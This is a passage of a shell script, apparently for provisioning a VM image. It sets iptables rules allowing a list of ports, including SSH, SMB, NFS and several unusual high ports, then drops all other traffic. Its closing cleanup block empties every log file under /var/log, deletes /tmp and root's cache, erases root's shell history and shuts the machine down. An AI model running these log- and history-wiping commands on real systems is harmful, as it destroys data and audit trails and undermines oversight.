--icmp-type echo-reply -j ACCEPT iptables -A INPUT -j DROP iptables -A OUTPUT -o lo -j ACCEPT iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 21 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 22 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 25022 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 25022 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 40080 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 40080 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 33414 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 33414 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 139 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 139 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 111 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 111 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 443 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 445 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 445 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 2049 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 2049 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 10000 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --sport 10000 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT iptables -A OUTPUT -j DROP iptables-save > /etc/sysconfig/iptables # Cleaning up find /var/log -type f -exec sh -c "cat /dev/null > {}" \; rm -rf /tmp/* rm -rf /root/.cache cat /dev/null > /root/.bash_history && history -c && shutdown now